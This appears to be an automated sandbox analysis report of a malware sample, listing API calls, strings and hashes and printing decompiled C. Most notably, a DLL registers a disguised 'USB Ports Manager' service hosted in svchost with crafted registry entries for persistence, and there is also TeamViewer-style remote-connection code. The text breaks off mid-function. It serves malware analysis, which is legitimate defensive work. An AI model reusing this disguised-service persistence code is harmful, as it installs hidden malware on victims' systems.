                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004FB815
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB833
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB849
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB86E
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 004FB87A
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB898
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FB917
                                                                                                                        • __itoa.LIBCMT ref: 004FB984
                                                                                                                        • HttpOpenRequestA.WININET(?,?,?,00000000,00000000,?,84400000,00000000), ref: 004FBA69
                                                                                                                        • GetLastError.KERNEL32(00000001,00000000,00000001,00000000), ref: 004FBAA1
                                                                                                                        • HttpAddRequestHeadersA.WININET(?,Content-Type: application/octet-streamContent-Transfer-Encoding: binary,000000FF,A0000000), ref: 004FBC0C
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FBC2D
                                                                                                                        • HttpSendRequestExA.WININET(?,00000028,00000000,00000000,00000000), ref: 004FBC46
                                                                                                                        • GetLastError.KERNEL32 ref: 004FBC54
                                                                                                                        • InternetWriteFile.WININET(?,?,?,?), ref: 004FBD84
                                                                                                                        • GetLastError.KERNEL32 ref: 004FBD9F
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 004FBE9D
                                                                                                                        • GetLastError.KERNEL32 ref: 004FBEA7
                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,00000000,?,?), ref: 004FBEFC
                                                                                                                        • _memset.LIBCMT ref: 004FBF1E
                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,?), ref: 004FBF39
                                                                                                                        • _strncmp.LIBCMT ref: 004FBF52
                                                                                                                        • _strncmp.LIBCMT ref: 004FBF6D
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC00D
                                                                                                                        • HttpQueryInfoA.WININET(?,00000005,00000000,?,?), ref: 004FC0A0
                                                                                                                        • _memset.LIBCMT ref: 004FC0C2
                                                                                                                        • HttpQueryInfoA.WININET(?,00000005,?,?,?), ref: 004FC0DD
                                                                                                                        • _strncmp.LIBCMT ref: 004FC0F6
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC196
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 004FC230
                                                                                                                        • _memset.LIBCMT ref: 004FC24E
                                                                                                                        • InternetReadFile.WININET(?,?,?,?), ref: 004FC266
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004FC2B0
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FC3F3
                                                                                                                        • GetTickCount.KERNEL32 ref: 004FC5EC
                                                                                                                        Strings
                                                                                                                        • NC.WriteHttp: Retry limit reached, xrefs: 004FC3CD, 004FC479
                                                                                                                        • Content-Type: application/octet-streamContent-Transfer-Encoding: binary, xrefs: 004FBC06
                                                                                                                        • NC.WriteHttp.Timeout, xrefs: 004FB8AD
                                                                                                                        • &data=, xrefs: 004FB9F3
                                                                                                                        • 204, xrefs: 004FBF65
                                                                                                                        • writeDataHttp.SendRequestEx., xrefs: 004FBC5E
                                                                                                                        • NC.WriteHttp.Resend, xrefs: 004FC442
                                                                                                                        • NC.WriteHttp: HTTP response content length is , xrefs: 004FC116
                                                                                                                        • POST, xrefs: 004FBA30
                                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response content length, last error = , xrefs: 004FC1AD
                                                                                                                        • &client=DynGate, xrefs: 004FB9A5
                                                                                                                        • NC.WriteHttp: HTTP response status code = , xrefs: 004FBF8D
                                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response body, last error = , xrefs: 004FC2C7
                                                                                                                        • NC.WriteHttp.PostBlockTimeout, xrefs: 004FC389
                                                                                                                        • */*, xrefs: 004FB941
                                                                                                                        • NC.WriteHttp: Setting LimitForGetInsteadPost to 0, xrefs: 004FC354
                                                                                                                        • Content-Type: application/octet-streamContent-Transfer-Encoding: binaryX-Connection: close, xrefs: 004FBBFF
                                                                                                                        • NC.WriteHttp.Failed1 EC=, xrefs: 004FBB19
                                                                                                                        • 200, xrefs: 004FBF4A
                                                                                                                        • &p=, xrefs: 004FB98C
                                                                                                                        • NC.WriteHttp.Failed2 EC=, xrefs: 004FBCCC
                                                                                                                        • NC.WriteHttp.Failed3 EC=, xrefs: 004FBDA9
                                                                                                                        • writeDatahttp.OpenRequest, xrefs: 004FBAAB
                                                                                                                        • NC.WriteHttp: unable to retrieve HTTP response status code, last error = , xrefs: 004FC024
                                                                                                                        • /dout.aspx?s=, xrefs: 004FB957
                                                                                                                        • GET, xrefs: 004FBA0F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CountHttpTick$ErrorLast$Query$H_prolog3InfoRequest$CriticalInternetSection_memset_strncmp$FileInitialize$AvailableDataDeleteH_prolog3_H_prolog3_catchHeadersOpenReadSendSleepWrite__itoa_swprintf
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F333C60() {
                                                                                                                        				char _v760;
                                                                                                                        				char _v772;
                                                                                                                        				char _v780;
                                                                                                                        				char _v1016;
                                                                                                                        				char _v1024;
                                                                                                                        				char _v1032;
                                                                                                                        				char _v1036;
                                                                                                                        				char _v1040;
                                                                                                                        				char _v1044;
                                                                                                                        				char _v1048;
                                                                                                                        				intOrPtr _v1052;
                                                                                                                        				int _v1056;
                                                                                                                        				intOrPtr _v1060;
                                                                                                                        				int _v1064;
                                                                                                                        				intOrPtr _v1068;
                                                                                                                        				int _v1072;
                                                                                                                        				int* _v1076;
                                                                                                                        				char _v1080;
                                                                                                                        				char* _v1084;
                                                                                                                        				char* _v1088;
                                                                                                                        				void* _v1092;
                                                                                                                        				void* _v1096;
                                                                                                                        				char _v1100;
                                                                                                                        				void* _v1104;
                                                                                                                        				void* _v1108;
                                                                                                                        				void* _v1112;
                                                                                                                        				int _v1116;
                                                                                                                        				void* _v1120;
                                                                                                                        				char* _v1124;
                                                                                                                        				void* _v1128;
                                                                                                                        				intOrPtr _v1132;
                                                                                                                        				char _v1140;
                                                                                                                        				void* _t80;
                                                                                                                        				long _t84;
                                                                                                                        				void** _t85;
                                                                                                                        				long _t93;
                                                                                                                        				char* _t99;
                                                                                                                        				int _t100;
                                                                                                                        				intOrPtr _t104;
                                                                                                                        				long _t107;
                                                                                                                        				intOrPtr _t108;
                                                                                                                        				long _t111;
                                                                                                                        				long _t114;
                                                                                                                        				long _t117;
                                                                                                                        				char* _t125;
                                                                                                                        				void* _t145;
                                                                                                                        				long _t151;
                                                                                                                        				char* _t173;
                                                                                                                        				CHAR* _t174;
                                                                                                                        				long _t182;
                                                                                                                        				char** _t196;
                                                                                                                        				char** _t199;
                                                                                                                        				char** _t200;
                                                                                                                        				char** _t201;
                                                                                                                        				char** _t202;
                                                                                                                        				char** _t203;
                                                                                                                        				intOrPtr _t207;
                                                                                                                        				intOrPtr _t220;
                                                                                                                        
                                                                                                                        				_t196 =  &_v1124;
                                                                                                                        				_v1112 = 0;
                                                                                                                        				_t80 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                                                        				_v1108 = _t80;
                                                                                                                        				if(_t80 != 0) {
                                                                                                                        					L2:
                                                                                                                        					_v1124 = 0;
                                                                                                                        					_t145 = OpenServiceA(_t80, "USBManager", 0xf01ff);
                                                                                                                        					if(_t145 != 0) {
                                                                                                                        						L14:
                                                                                                                        						_v1112 = 1;
                                                                                                                        						wsprintfA( &_v1044, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
                                                                                                                        						_t84 = RegCreateKeyExA(0x80000002,  &_v1036, 0, 0, 0, 0xf023f, 0,  &_v1116, 0); // executed
                                                                                                                        						if(_t84 == 0) {
                                                                                                                        							_push(0x105);
                                                                                                                        							_push( &_v1036);
                                                                                                                        							L6F33C2EE();
                                                                                                                        							_v1120 = 0x105;
                                                                                                                        							_v1116 = 2;
                                                                                                                        							_t93 = RegQueryValueExA(_v1124, "ServiceDLL", 0,  &_v1116,  &_v1044,  &_v1120); // executed
                                                                                                                        							if(_t93 != 0) {
                                                                                                                        								L17:
                                                                                                                        								_t151 = M6F34052C; // 0x33
                                                                                                                        								_t173 = M6F340524; // 0xa56118
                                                                                                                        								RegSetValueExA(_v1124, "ServiceDLL", 0, 2, _t173, _t151 + 1);
                                                                                                                        							} else {
                                                                                                                        								_t174 = M6F340524; // 0xa56118
                                                                                                                        								if(lstrcmpiA( &_v1044, _t174) != 0) {
                                                                                                                        									goto L17;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							RegCloseKey(_v1124);
                                                                                                                        						}
                                                                                                                        						L6F33C2EE();
                                                                                                                        						_t85 =  &_v1104;
                                                                                                                        						_v1104 = 0;
                                                                                                                        						__imp__QueryServiceStatusEx(_t145, 0,  &_v1080, 0x24, _t85,  &_v1072, 0x24);
                                                                                                                        						if(_t85 == 0 || _v1096 != 4) {
                                                                                                                        							_t220 = M6F340544; // 0x1
                                                                                                                        							if(_t220 == 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        							} else {
                                                                                                                        								_push(1);
                                                                                                                        								_v1140 = "s";
                                                                                                                        								_push( &_v1140);
                                                                                                                        							}
                                                                                                                        							_push(_t145);
                                                                                                                        							E6F3337D0();
                                                                                                                        						}
                                                                                                                        						CloseServiceHandle(_t145);
                                                                                                                        					} else {
                                                                                                                        						_t207 = M6F340544; // 0x1
                                                                                                                        						if(_t207 != 0) {
                                                                                                                        							_t99 = M6F34053C; // 0xa32c55
                                                                                                                        							_t100 = wsprintfA( &_v780, "%%SYSTEMROOT%%\\system32\\%s.exe -k \"%s\" -svcr \"%s\"", "svchost", "USBPortsManagerGrp", _t99);
                                                                                                                        							_t199 =  &(_t196[5]);
                                                                                                                        							_v1112 = _t100;
                                                                                                                        							_t145 = CreateServiceA(_v1100, "USBManager", "USB Ports Manager", 0xf01ff, 0x20, 2, 0,  &_v772, 0, 0, 0, 0, 0);
                                                                                                                        							if(_t145 != 0) {
                                                                                                                        								_v1072 = 1;
                                                                                                                        								_v1064 = 1;
                                                                                                                        								_v1056 = 1;
                                                                                                                        								_v1068 = 0x1388;
                                                                                                                        								_v1060 = 0x1388;
                                                                                                                        								_v1052 = 0x1388;
                                                                                                                        								_v1092 = 0;
                                                                                                                        								_v1084 = 0;
                                                                                                                        								_v1088 = 0;
                                                                                                                        								_v1080 = 3;
                                                                                                                        								_v1076 =  &_v1072;
                                                                                                                        								__imp__ChangeServiceConfig2A(_t145, 2,  &_v1092);
                                                                                                                        								_t104 =  *0x6f34047c; // 0xa545e0
                                                                                                                        								wsprintfA( &_v1048, "%s\\%s%c%s", _t104, "svchost", 0, 0x6f33d543);
                                                                                                                        								_t200 =  &(_t199[6]);
                                                                                                                        								_t107 = RegCreateKeyExA(0x80000002,  &_v1040, 0, 0, 0, 0xf023f, 0,  &_v1120, 0); // executed
                                                                                                                        								if(_t107 == 0) {
                                                                                                                        									RegSetValueExA(_v1120, "USBPortsManagerGrp", 0, 7, "USBManager", lstrlenA("USBManager")); // executed
                                                                                                                        									RegCloseKey(_v1120);
                                                                                                                        								}
                                                                                                                        								_t108 =  *0x6f34047c; // 0xa545e0
                                                                                                                        								wsprintfA( &_v1040, "%s\\%s%c%s", _t108, "svchost", 0x5c, "USBPortsManagerGrp");
                                                                                                                        								_t201 =  &(_t200[6]);
                                                                                                                        								_t111 = RegCreateKeyExA(0x80000002,  &_v1032, 0, 0, 0, 0xf023f, 0,  &_v1112, 0); // executed
                                                                                                                        								if(_t111 == 0) {
                                                                                                                        									E6F332170(_v1112, 4);
                                                                                                                        									_t201 =  &(_t201[2]);
                                                                                                                        									_v1100 = 0x2000;
                                                                                                                        									RegSetValueExA(_v1112, "AuthenticationCapabilities", 0, 4,  &_v1100, 4); // executed
                                                                                                                        									_v1104 = 1;
                                                                                                                        									RegSetValueExA(_v1112, "CoInitializeSecurityParam", 0, 4,  &_v1104, 4); // executed
                                                                                                                        									RegCloseKey(_v1112);
                                                                                                                        								}
                                                                                                                        								wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", "\\Parameters");
                                                                                                                        								_t202 =  &(_t201[5]);
                                                                                                                        								_t114 = RegCreateKeyExA(0x80000002,  &_v1024, 0, 0, 0, 0xf023f, 0,  &_v1104, 0); // executed
                                                                                                                        								if(_t114 == 0) {
                                                                                                                        									E6F332170(_v1104, 4);
                                                                                                                        									_t182 = M6F34052C; // 0x33
                                                                                                                        									_t125 = M6F340524; // 0xa56118
                                                                                                                        									_t202 =  &(_t202[2]);
                                                                                                                        									RegSetValueExA(_v1104, "ServiceDLL", 0, 2, _t125, _t182 + 1); // executed
                                                                                                                        									RegSetValueExA(_v1104, "ImagePath", 0, 2,  &_v760, _v1100 + 1); // executed
                                                                                                                        									RegSetValueExA(_v1104, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry")); // executed
                                                                                                                        									_v1096 = 0;
                                                                                                                        									RegSetValueExA(_v1104, "ServiceDllUnloadOnStop", 0, 4,  &_v1096, 4); // executed
                                                                                                                        									RegCloseKey(_v1104);
                                                                                                                        								}
                                                                                                                        								wsprintfA( &_v1024, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
                                                                                                                        								_t203 =  &(_t202[5]);
                                                                                                                        								_t117 = RegCreateKeyExA(0x80000002,  &_v1016, 0, 0, 0, 0xf023f, 0,  &_v1096, 0); // executed
                                                                                                                        								if(_t117 == 0) {
                                                                                                                        									E6F332170(_v1096, 4);
                                                                                                                        									_t203 =  &(_t203[2]);
                                                                                                                        									RegSetValueExA(_v1096, "ServiceMain", 0, 1, "SvcEntry", lstrlenA("SvcEntry")); // executed
                                                                                                                        									RegCloseKey(_v1096);
                                                                                                                        								}
                                                                                                                        								E6F332170(_t145, 2);
                                                                                                                        								_t196 =  &(_t203[2]);
                                                                                                                        								goto L14;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					CloseServiceHandle(_v1128);
                                                                                                                        					return _v1132;
                                                                                                                        				} else {
                                                                                                                        					_t80 = OpenSCManagerA(0, 0, 1);
                                                                                                                        					_v1108 = _t80;
                                                                                                                        					if(_t80 == 0) {
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						goto L2;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                        • wsprintfA.USER32 ref: 6F333CEF
                                                                                                                        • CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                        • ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                        • wsprintfA.USER32 ref: 6F333D95
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 6F333DB3
                                                                                                                        • lstrlenA.KERNEL32(USBManager,?,?,?,00000000,00000002,?), ref: 6F333DC2
                                                                                                                        • RegSetValueExA.KERNEL32(?,USBPortsManagerGrp,00000000,00000007,USBManager,00000000,?,?,?,00000000,00000002,?), ref: 6F333DDB
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 6F333DE2
                                                                                                                        • wsprintfA.USER32 ref: 6F333E04
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333E22
                                                                                                                        • RegSetValueExA.KERNEL32 ref: 6F333E57
                                                                                                                        • RegSetValueExA.KERNEL32(00000000,CoInitializeSecurityParam,00000000,00000004,?,00000004), ref: 6F333E75
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 6F333E7C
                                                                                                                        • wsprintfA.USER32 ref: 6F333E9B
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333EB9
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceDLL,00000000,00000002,00A56118,00000034), ref: 6F333EF1
                                                                                                                        • RegSetValueExA.KERNEL32(?,ImagePath,00000000,00000002,?,?), ref: 6F333F0E
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333F15
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333F2E
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceDllUnloadOnStop,00000000,00000004,?,00000004), ref: 6F333F48
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333F4F
                                                                                                                        • wsprintfA.USER32 ref: 6F333F6E
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F333F8C
                                                                                                                        • lstrlenA.KERNEL32(SvcEntry), ref: 6F333FAA
                                                                                                                        • RegSetValueExA.KERNEL32(?,ServiceMain,00000000,00000001,SvcEntry,00000000), ref: 6F333FC3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F333FCA
                                                                                                                        • wsprintfA.USER32 ref: 6F333FFC
                                                                                                                        • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,\Parameters), ref: 6F33401A
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000105), ref: 6F334032
                                                                                                                        • RegQueryValueExA.KERNEL32 ref: 6F334061
                                                                                                                        • lstrcmpiA.KERNEL32(?,00A56118), ref: 6F334077
                                                                                                                        • RegSetValueExA.ADVAPI32(?,ServiceDLL,00000000,00000002,00A56118,00000034), ref: 6F33409D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3340A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000024), ref: 6F3340B1
                                                                                                                        • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,00000024), ref: 6F3340C8
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3340FE
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 6F334109
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
                                                                                                                        • String ID: %%SYSTEMROOT%%\system32\%s.exe -k "%s" -svcr "%s"$%s\%s%c%s$AuthenticationCapabilities$CoInitializeSecurityParam$ImagePath$SYSTEM\CurrentControlSet%s%s%s$ServiceDLL$ServiceDllUnloadOnStop$ServiceMain$SvcEntry$USB Ports Manager$USBManager$USBPortsManagerGrp$\Parameters$\Services\$svchost
                                                                                                                        • API String ID: 567274075-2313540708
                                                                                                                        • Opcode ID: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction ID: e75517b751e58ab8b4c927880bb4f16b22d5a4c9f60e3aac4c359e693cc06952
                                                                                                                        • Opcode Fuzzy Hash: 6c46b81ff668685163f17a5dd8cb97c76a573c8b989e1ee7d0da47bd9e696097
                                                                                                                        • Instruction Fuzzy Hash: 8FD17CB2A04798BFD310DF61CC85E6BB7EDFB99B08F40490DF69992140D772E4188B66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004DC9F8
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004CD12C: __EH_prolog3.LIBCMT ref: 004CD133
                                                                                                                          • Part of subcall function 004CD12C: GetTickCount.KERNEL32 ref: 004CD14A
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004EA0E3: __EH_prolog3.LIBCMT ref: 004EA0EA
                                                                                                                          • Part of subcall function 004EA0E3: GetCurrentThread.KERNEL32 ref: 004EA12F
                                                                                                                          • Part of subcall function 004EA0E3: SetThreadPriority.KERNEL32(00000000), ref: 004EA136
                                                                                                                          • Part of subcall function 004E9D17: __EH_prolog3.LIBCMT ref: 004E9D1E
                                                                                                                          • Part of subcall function 004B982C: __EH_prolog3.LIBCMT ref: 004B9833
                                                                                                                          • Part of subcall function 004B5743: __EH_prolog3.LIBCMT ref: 004B574A
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(10000000,?,00000000,00000100), ref: 004B5794
                                                                                                                          • Part of subcall function 004B5743: LoadStringW.USER32(?,?,00000000,00000100), ref: 004B57CB
                                                                                                                          • Part of subcall function 004BEE12: __EH_prolog3.LIBCMT ref: 004BEE19
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        • GetTickCount.KERNEL32 ref: 004DD2FD
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 004DD31E
                                                                                                                          • Part of subcall function 004C0863: __EH_prolog3.LIBCMT ref: 004C086A
                                                                                                                          • Part of subcall function 004C8458: __EH_prolog3.LIBCMT ref: 004C845F
                                                                                                                          • Part of subcall function 004B7793: __EH_prolog3_catch.LIBCMT ref: 004B779D
                                                                                                                        • GetTickCount.KERNEL32 ref: 004DD324
                                                                                                                        • PostMessageW.USER32(00000407,00000001,00000001,0085300C), ref: 004DD798
                                                                                                                        • Sleep.KERNEL32(000000C8), ref: 004DDA99
                                                                                                                        • __time32.LIBCMT ref: 004DDAD4
                                                                                                                        • _rand.LIBCMT ref: 004DDAFF
                                                                                                                        • _rand.LIBCMT ref: 004DDB2B
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0085300C,0077C1F8), ref: 004DDB70
                                                                                                                        • PostMessageW.USER32(00000407,00000001,00000002), ref: 004DDB9D
                                                                                                                        • PostMessageW.USER32(00000407,00000001,00000003), ref: 004DDBD5
                                                                                                                          • Part of subcall function 004DC716: __EH_prolog3.LIBCMT ref: 004DC71D
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,0085300C,0077C1F8), ref: 004DDC53
                                                                                                                        Strings
                                                                                                                        • BROWSER, xrefs: 004DCB58
                                                                                                                        • MANUAL, xrefs: 004DCB98
                                                                                                                        • GWW.CustomRouterUnavailable, xrefs: 004DD3D5
                                                                                                                        • GWW.KeepAliveLost, xrefs: 004DD500
                                                                                                                        • TeamViewer, xrefs: 004DD396
                                                                                                                        • Proxy: Trying to connect. Mode=, xrefs: 004DCC60
                                                                                                                        • ProxySearch: Failed. No working setting found., xrefs: 004DCF43
                                                                                                                        • ProxySearch: Trying to connect with found setting: DIRECT (NONE), xrefs: 004DCE60
                                                                                                                        • ProxySearch: Trying to connect with found setting: , xrefs: 004DCDFD
                                                                                                                        • ProxySearch: Trying to connect with found setting: IE, xrefs: 004DCDD9
                                                                                                                        • WaitAtGateway::Run(): Could not connect to Master-Server MasterIp=, xrefs: 004DD913
                                                                                                                        • WaitAtGateway::Run() Connect to Master successful, xrefs: 004DD8EC
                                                                                                                        • , Proxy-IP=, xrefs: 004DCC4B
                                                                                                                        • WaitAtGateway, xrefs: 004DCA06, 004DD053, 004DD87A
                                                                                                                        • DIRECT (NONE), xrefs: 004DCB18
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Sleep$CountMessagePostTick$InitializeLoadStringThread_rand$CurrentDeleteEnterH_prolog3_catchLeavePriority__time32
                                                                                                                        • String ID: , Proxy-IP=$BROWSER$DIRECT (NONE)$GWW.CustomRouterUnavailable$GWW.KeepAliveLost$MANUAL$Proxy: Trying to connect. Mode=$ProxySearch: Failed. No working setting found.$ProxySearch: Trying to connect with found setting: $ProxySearch: Trying to connect with found setting: DIRECT (NONE)$ProxySearch: Trying to connect with found setting: IE$TeamViewer$WaitAtGateway$WaitAtGateway::Run() Connect to Master successful$WaitAtGateway::Run(): Could not connect to Master-Server MasterIp=
                                                                                                                        • API String ID: 1809673057-3897402427
                                                                                                                        • Opcode ID: 1f3b7961b58a2b7d95da6dbbf2a673e1e8024ead0c5184593f76227b4b01f95a
                                                                                                                        • Instruction ID: d9812ff84bd4b09a939aa376837265a540f3df5c3d9b162d162bc6b2bbe51010
                                                                                                                        • Opcode Fuzzy Hash: 1f3b7961b58a2b7d95da6dbbf2a673e1e8024ead0c5184593f76227b4b01f95a
                                                                                                                        • Instruction Fuzzy Hash: 5AC21770D05288AADF11EBA4C965BEEBBB5AF51304F14409FE04167392DB7C1F48C76A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 81%
                                                                                                                        			E6F3328B0(intOrPtr _a8) {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				char _v520;
                                                                                                                        				char _v528;
                                                                                                                        				struct _WIN32_FIND_DATAA _v840;
                                                                                                                        				void* _t25;
                                                                                                                        				intOrPtr _t36;
                                                                                                                        				char _t43;
                                                                                                                        				void* _t48;
                                                                                                                        				CHAR* _t49;
                                                                                                                        				struct _WIN32_FIND_DATAA* _t53;
                                                                                                                        				DWORD* _t54;
                                                                                                                        
                                                                                                                        				_t53 =  &_v840;
                                                                                                                        				_push(0x140);
                                                                                                                        				_push( &_v840);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_push(0x208);
                                                                                                                        				_push( &_v528);
                                                                                                                        				L6F33C2EE();
